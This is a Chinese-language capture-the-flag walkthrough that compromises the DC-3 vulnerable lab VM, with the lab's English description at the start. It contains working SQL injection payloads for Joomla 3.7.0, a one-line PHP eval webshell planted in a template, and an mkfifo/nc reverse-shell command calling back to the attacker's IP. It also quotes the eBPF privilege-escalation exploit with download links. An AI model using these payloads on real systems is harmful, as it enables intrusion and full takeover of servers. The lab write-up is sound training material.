DC-3

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

信息收集

nmap

  • 扫描网段发现主机ip 192.168.253.132

  • 对其全端口扫描,发现之开启了web服务

查看页面

目录爆破,发现后台登录点

发现后台管理页面

cms为joomla,用joomscan扫一下试试

没发现其他什么信息,就可以看到joomla的版本时3.7.0

对爆破出来的目录都看了看,没啥有用信息

用户登录页也没啥可以注入的

那就searchsploit joomla 3.7.0

发现存在sql注入

脱库

看一下怎么操作

由下面可以看出joomla网站的index.php的list[fullordering]参数存在注入点,sqlmap的payload人家也写好了只需要将localhost变为靶机地址,其中list[fullordering]可以布尔盲注,报错注入,延时注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

使用sqlmap

跑出来了joomladb

接下来素质三连

  1. –tables -D “db_name” 【获取指定数据库中的表名 -D后接指定的数据库名称

看到了users表

  1. –columns -T “table_name” -D “db_name” 【获取数据库表中的字段

正在暴力破解

拿到字段名

  1. –dump -C “columns_name” -T “table_name” -D “db_name” 【获取字段的数据内容

    拿到加密后的管理员密码

用john破解

可以看到需要一个密码文件

保存pass.txt,开始爆破,拿到密码snoopy

登陆后台

有文件上传点,尝试了图片木马但是无法绕过检测

有模板模块,里面存放了模板文件,修改模板文件添加我们的一句话木马来getshell

点进去

可以看到该模板的文件有很多,

修改随便一个php文件,这里给component.php写入一句话木马,注意要先清空该文件再写入

<?php @eval($_REQUEST['cmd']);?>

我们要用蚁剑连接,就要获取该文件的位置

方法两个:

  • 百度搜索joomla模板存储位置
  • 用刚才的目录爆破结果获得路径

这里用方法2拿到绝对路径

由下图可以看到存放模板的路径

所以猜测URI为/templates/beez3/component.php,正常反应说明有这个文件

找到shell的路径后用蚁剑连接

连接成功

打开shell

反弹shell

  • nc反弹,发现禁用了-e参数,所以不行
  • bash反弹也报错
  • php反弹也报错
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.253.131 8888 >/tmp/f 成功

获取反弹shell成功

升级为交互式shell

两种都可以

  • python -c ‘import pty;pty.spawn(“/bin/bash”)’
  • SHELL=/bin/bash script -q /dev/null

提权

suid以及sudo-l均不行

查找系统漏洞

先看系统版本,linux 4.4.0 ubuntu 16.04

searchspliot ubuntu 16.04

试了半天也就这个能用

看一下咋用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

	/* look for pseudo eBPF instructions that access map FDs and
	 * replace them with actual map pointers
	 */
	static int replace_map_fd_with_map_ptr(struct verifier_env *env)
	{
		struct bpf_insn *insn = env->prog->insnsi;
		int insn_cnt = env->prog->len;
		int i, j;

		for (i = 0; i < insn_cnt; i++, insn++) {
			[checks for bad instructions]

			if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
				struct bpf_map *map;
				struct fd f;

				[checks for bad instructions]

				f = fdget(insn->imm);
				map = __bpf_map_get(f);
				if (IS_ERR(map)) {
					verbose("fd %d is not pointing to valid bpf_map\n",
						insn->imm);
					fdput(f);
					return PTR_ERR(map);
				}

				[...]
			}
		}
		[...]
	}


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

前面一大堆是在讲原理,我们关注下面这块:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

可以看到最后一行为EXP下载地址,下载下来:

下载失败了,尝试了网上各种解决该问题方法也无果

最后从别人网盘下载到了这个exp压缩包

链接:https://pan.baidu.com/s/1LDzUYmpMKQEr7LCWlmxVHw
提取码:luc8

下载下来后用蚁剑上传到靶机/tmp下,因为该目录肯定有写入权限

看一下上传成功没

nice!接下来根据39772.txt里面的usage进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

首先解压压缩包

进入39772,解压exploit.tar

看到了usage里面提到的ebpf_mapfd_doubleput

cd进去

然后跟着usage里面的步骤做就可以了

提权成功,获取flag

总结

  1. 学习使用了joomscan扫描网站
  2. 复习了sqlmap的素质六连脱库
  3. 学习使用了john爆破加密密码
  4. 学习使用模板模块来给服务器写入一句话木马
  5. 反弹shell的新姿势
  6. 学习了searchsploit中txt文件的使用方法以及英语阅读能力
  7. 学习了wget来下载文件

总体思路:信息收集–查找exp–登陆后台–上传webshell–反弹shell–提权

https://blog.csdn.net/rpsate/article/details/119682569?spm=1001.2014.3001.5501

https://gcdcx.blog.csdn.net/article/details/106281151